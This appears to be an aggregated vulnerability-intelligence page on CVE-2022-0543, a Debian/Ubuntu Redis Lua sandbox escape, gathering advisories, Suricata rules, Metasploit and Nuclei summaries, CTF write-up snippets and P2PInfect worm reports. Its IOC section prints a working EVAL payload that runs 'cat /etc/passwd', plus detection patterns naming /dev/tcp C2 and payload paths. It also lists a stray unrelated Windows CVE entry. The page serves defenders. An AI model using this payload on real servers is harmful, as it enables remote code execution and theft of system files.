CVE-2022-0543
published 2022-02-18CVE-2022-0543: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could…
PriorityP198critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
99.67%
99.9th percentile
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | redis | < redis 5:6.0.16-2 (bookworm) | redis 5:6.0.16-2 (bookworm) |
| debian | redis | — | — |
| redis | redis | >= 0 < 5:6.0.16-1+deb11u2 | 5:6.0.16-1+deb11u2 |
| redis | redis | >= 0 < 5:6.0.16-2 | 5:6.0.16-2 |
| redis | redis | >= 0 < 5:6.0.16-2 | 5:6.0.16-2 |
| redis | redis | >= 0 < 5:6.0.16-2 | 5:6.0.16-2 |
Detection & IOCsextracted from sources · hover to see the quote
commandeval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0
↗
- →Monitor for outbound connections from Redis processes to port 60100, which is used by P2PInfect for P2P C2 communication after exploiting CVE-2022-0543. ↗
- →Detect P2PInfect initial payload download by monitoring for plaintext HTTP GET requests to '/linux', '/miner', '/winminer', or '/windows' paths originating from Redis processes. ↗
- →Monitor Redis processes for use of /dev/tcp for outbound network connections, which is a technique used in the P2PInfect exploit payload to connect to C2. ↗
- →Detect P2PInfect MIPS variant propagation by monitoring for SFTP/SCP upload attempts of ELF binaries to SSH servers using weak credentials, and for attempts to install 'redis-server' via the OpenWRT package named 'redis-server'. ↗
- →Hunt for P2PInfect evasion: monitor processes reading '/proc/self/status' for 'TracerPid' checks and system calls disabling Linux core dumps, which are anti-analysis techniques used by the latest P2PInfect variant. ↗
- →The vulnerability only affects Redis on Debian and Ubuntu (and derived) distributions due to a packaging issue; scope detection should focus on these OS families. ↗
- →The Nuclei template for CVE-2022-0543 uses a regex match for 'root:.*:0:0:' in the Redis EVAL response to confirm successful sandbox escape and RCE. ↗
- ·CVE-2022-0543 is NOT a Redis application vulnerability — it is a Debian/Ubuntu packaging issue with the Lua library. Redis instances on other distributions are not affected. ↗
- ·Staged Meterpreter payloads will fail on typical Debian/Ubuntu Redis deployments due to the 'MemoryDenyWriteExecute' systemd permission; stageless payloads should be used for testing. ↗
- ·The Metasploit module only supports x86_64 architecture, though the vulnerability could theoretically be exploited on i386, arm, ppc, etc. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vulncheck10.0CRITICAL
cisa10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9wpj-h5jq-88p9: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which co
ghsa_unreviewed·2022-02-19
CVE-2022-0543 [CRITICAL] CWE-862 GHSA-9wpj-h5jq-88p9: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which co
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
OSV
CVE-2022-0543: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which co
osv·2022-02-18·CVSS 10.0
CVE-2022-0543 [CRITICAL] CVE-2022-0543: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which co
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
VulnCheck
Debian-specific Redis Server Lua Sandbox Escape Vulnerability
vulncheck·2022·CVSS 10.0
CVE-2022-0543 [CRITICAL] CWE-862 Debian-specific Redis Server Lua Sandbox Escape Vulnerability
Debian-specific Redis Server Lua Sandbox Escape Vulnerability
Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Affected: Redis Debian-specific Redis Servers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.aquasec.com/redigo-redis-backdoor-malware; https://cybersecuritynews.com/hackers-drops-bakcdoor-malware-redigo-redis-server/; https://www.aquasec.com/blog/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware/; https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-enterprise-applicati
CISA
Debian-specific Redis Server Lua Sandbox Escape Vulnerability
cisa·2022-03-28·CVSS 10.0
CVE-2022-0543 [CRITICAL] CWE-862 Debian-specific Redis Server Lua Sandbox Escape Vulnerability
Vulnerability: Debian-specific Redis Server Lua Sandbox Escape Vulnerability
Affected: Redis Debian-specific Redis Servers
Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-0543
Remediation Due Date: 2022-04-18
CISA
Microsoft Windows Privilege Escalation Vulnerability
cisa·2022-03-15·CVSS 7.8
CVE-2019-0543 [HIGH] CWE-287 Microsoft Windows Privilege Escalation Vulnerability
Vulnerability: Microsoft Windows Privilege Escalation Vulnerability
Affected: Microsoft Windows
A privilege escalation vulnerability exists when Windows improperly handles authentication requests. An attacker who successfully exploited this vulnerability could run processes in an elevated context.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-0543
Remediation Due Date: 2022-04-05
Ubuntu
Redis vulnerability
vendor_ubuntu·2022-03-08
CVE-2022-0543 Redis vulnerability
Title: Redis vulnerability
Summary: Redis could be made to run programs if it received specially crafted
network traffic from an authenticated user.
Reginaldo Silva discovered that due to a packaging issue, a remote attacker
with the ability to execute arbitrary Lua scripts could possibly escape the
Lua sandbox and execute arbitrary code on the host.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2022-0543: redis - It was discovered, that redis, a persistent key-value database, due to a packagi...
vendor_debian·2022·CVSS 10.0
CVE-2022-0543 [CRITICAL] CVE-2022-0543: redis - It was discovered, that redis, a persistent key-value database, due to a packagi...
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
Scope: local
bookworm: resolved (fixed in 5:6.0.16-2)
bullseye: resolved (fixed in 5:6.0.16-1+deb11u2)
forky: resolved (fixed in 5:6.0.16-2)
sid: resolved (fixed in 5:6.0.16-2)
trixie: resolved (fixed in 5:6.0.16-2)
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
suricata·2026-01-27·CVSS 10.0
CVE-2022-0543 [CRITICAL] ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"|22|luaopen_"; within:200; reference:cve,2022-0543; classtype:attempted-admin; sid:2067133; rev:1; metadata:attack_target Server, created_at 2026_01_27, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2026_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
suricata·2022-04-04·CVSS 10.0
CVE-2022-0543 [CRITICAL] ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M2"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; within:500; content:".execute|28|"; distance:0; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035719; rev:2; metadata:affected_product Redis, attack_target Server, created_at 2022_04_04, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_04_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543)
suricata·2022-04-04·CVSS 10.0
CVE-2022-0543 [CRITICAL] ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543)
ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543)
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Possible Redis RCE Attempt - Dynamic Importing of liblua (CVE-2022-0543)"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; within:500; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035720; rev:2; metadata:affected_product Redis, created_at 2022_04_04, cve CVE_2022_0543, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_04_04;)
Suricata
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1
suricata·2022-04-04·CVSS 10.0
CVE-2022-0543 [CRITICAL] ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1
ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1
Rule: alert tcp any any -> $HOME_NET any (msg:"ET EXPLOIT Redis RCE Attempt (CVE-2022-0543) M1"; flow:established,to_server; content:"package|2e|loadlib|28|"; fast_pattern; content:"liblua"; distance:0; content:".popen|28|"; distance:0; reference:url,blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers; reference:url,www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce; reference:cve,2022-0543; classtype:attempted-admin; sid:2035718; rev:2; metadata:affected_product Redis, attack_target Server, created_at 2022_04_04, cve CVE_2022_0543, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_04_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acces
Metasploit
Redis Lua Sandbox Escape
metasploit·CVSS 10.0
CVE-2022-0543 [CRITICAL] Redis Lua Sandbox Escape
Redis Lua Sandbox Escape
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload. Redis can be configured with authentication or not. This module will work with either configuration (provided
Nuclei
Redis Sandbox Escape - Remote Code Execution
nuclei·CVSS 10.0
CVE-2022-0543 [CRITICAL] Redis Sandbox Escape - Remote Code Execution
Redis Sandbox Escape - Remote Code Execution
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
Template:
id: CVE-2022-0543
info:
name: Redis Sandbox Escape - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
impact: |
Successf
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Shared / README
ctf_writeups·CVSS 10.0
[CRITICAL] Shared / README
# Shared - HackTheBox - Writeup
Linux, 30 Base Points, Medium
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80```, and ```443```.
***User***: Found subdomain ```checkout.shared.htb``` with SQLi vulnerability, Using SQLi we get the password MD5 hash of ```james_mason``` user, By running ```pspy64``` we found that ```dan_smith``` runs ```ipython``` from ```/opt/scripts_review``` directory (we can write to this directory), Using ```CVE-2022-21699``` we get the SSH private key of ```dan_smith``` user.
***Root***: Found the binary ```/usr/local/bin/redis_connector_dev```, Run it locally and we get the password of ```redis-cli```, Using ```CVE-2022-0543``` we get RCE as ```root```.
## Shared Solution
###
CTF
Shared / README
ctf_writeups·CVSS 8.2
[HIGH] Shared / README
# Shared
## Summary
Running an `nmap` scan finds SSH and a basic online shop powered by [PrestaShop](https://www.prestashop.com) at `https://shared.htb`. We add an item to the cart and try to checkout, which redirects us to `checkout.shared.htb`. The website knows which items are in our cart through a `custom_cart` cookie on the `shared.htb` domain. The cookie references the product code and the quantity that is in our cart. We manually perform a [SQL union injection attack](https://portswigger.net/web-security/sql-injection/union-attacks) on this cookie and read a username and password hash, which can be cracked using [CrackStation](https://crackstation.net/), from the database. With our credentials, we connect to the machine via SSH as the `james_mason` user.
Now that we are on the bo
Bleepingcomputer
Stealthier version of P2Pinfect malware targets MIPS devices
blogs_bleepingcomputer·2023-12-04·CVSS 10.0
[CRITICAL] Stealthier version of P2Pinfect malware targets MIPS devices
## Stealthier version of P2Pinfect malware targets MIPS devices
## Bill Toulas
The latest variants of the P2Pinfect botnet are now focusing on infecting devices with 32-bit MIPS (Microprocessor without Interlocked Pipelined Stages) processors, such as routers and IoT devices.
Due to their efficiency and compact design, MIPS chips are prevalent in embedded systems like routers, residential gateways, and video game consoles.
P2Pinfect was discovered in July 2023 by Palo Alto Networks analysts (Unit 42) as a new Rust-based worm that targets Redis servers vulnerable to CVE-2022-0543.
Following its initial discovery, Cado Security analysts who examined P2Pinfect reported that it was abusing the Redis replication feature to spread, creating replicas of the infected instance.
Later, in Sept
Wiz
Crying Out Cloud - August Newsletter | Wiz
blogs_wiz·2023-08-30·CVSS 6.5
[MEDIUM] Crying Out Cloud - August Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's delve in.
Editor’s note: some of you may have noticed that we accidentally resent last month’s edition (July) – this was due to a technical issue for which we apologize.
Moving on – here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
## High severity vulnerabilities in Kubernetes on Windows nodes
Three high severity Kubernetes vulnerabilities were published on August 23. All three are flaws related to insufficient sanitization that could lead to privilege escalation. Kubernetes clusters are only affected by these vulnerabilities if they include Windows nodes. The vulnerabilities were assigned CVE-2023-3676
Unit42
P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm
blogs_unit42·2023-07-19·CVSS 10.0
[CRITICAL] P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm
## Executive Summary
On July 11, 2023, Unit 42 cloud researchers discovered a new peer-to-peer (P2P) worm we call P2PInfect. Written in Rust, a highly scalable and cloud-friendly programming language, this worm is capable of cross-platform infections and targets Redis, a popular open-source database application that is heavily used within cloud environments. Redis instances can be run on both Linux and Windows operating systems. Unit 42 researchers have identified over 307,000 unique Redis systems communicating publicly over the last two weeks, of which 934 may be vulnerable to this P2P worm variant. While not all of the 307,000 Redis instances will be vulnerable, the worm will still target these systems and attempt the compromise.
The P2PInfect worm infects vulnerable Redis instances by
Unit42
P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm
blogs_unit42·2023-07-19·CVSS 10.0
[CRITICAL] P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm
William Gamazo
Nathaniel Quist
Published: July 19, 2023
Cloud Cybersecurity Research
Threat Research
Cloud Security
Container security
P2p
Worm
## Executive Summary
On July 11, 2023, Unit 42 cloud researchers discovered a new peer-to-peer (P2P) worm we call P2PInfect. Written in Rust, a highly scalable and cloud-friendly programming language, this worm is capable of cross-platform infections and targets Redis, a popular open-source database application that is heavily used within cloud environments. Redis instances can be run on both Linux and Windows operating systems. Unit 42 researchers have identified over 307,000 unique Redis systems communic
http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.htmlhttps://bugs.debian.org/1005787https://lists.debian.org/debian-security-announce/2022/msg00048.htmlhttps://security.netapp.com/advisory/ntap-20220331-0004/https://www.debian.org/security/2022/dsa-5081https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rcehttp://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.htmlhttps://bugs.debian.org/1005787https://lists.debian.org/debian-security-announce/2022/msg00048.htmlhttps://security.netapp.com/advisory/ntap-20220331-0004/https://www.debian.org/security/2022/dsa-5081https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rcehttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-0543
2022-02-18
Published
2022-03-28
Added to CISA KEV
Exploited in the wild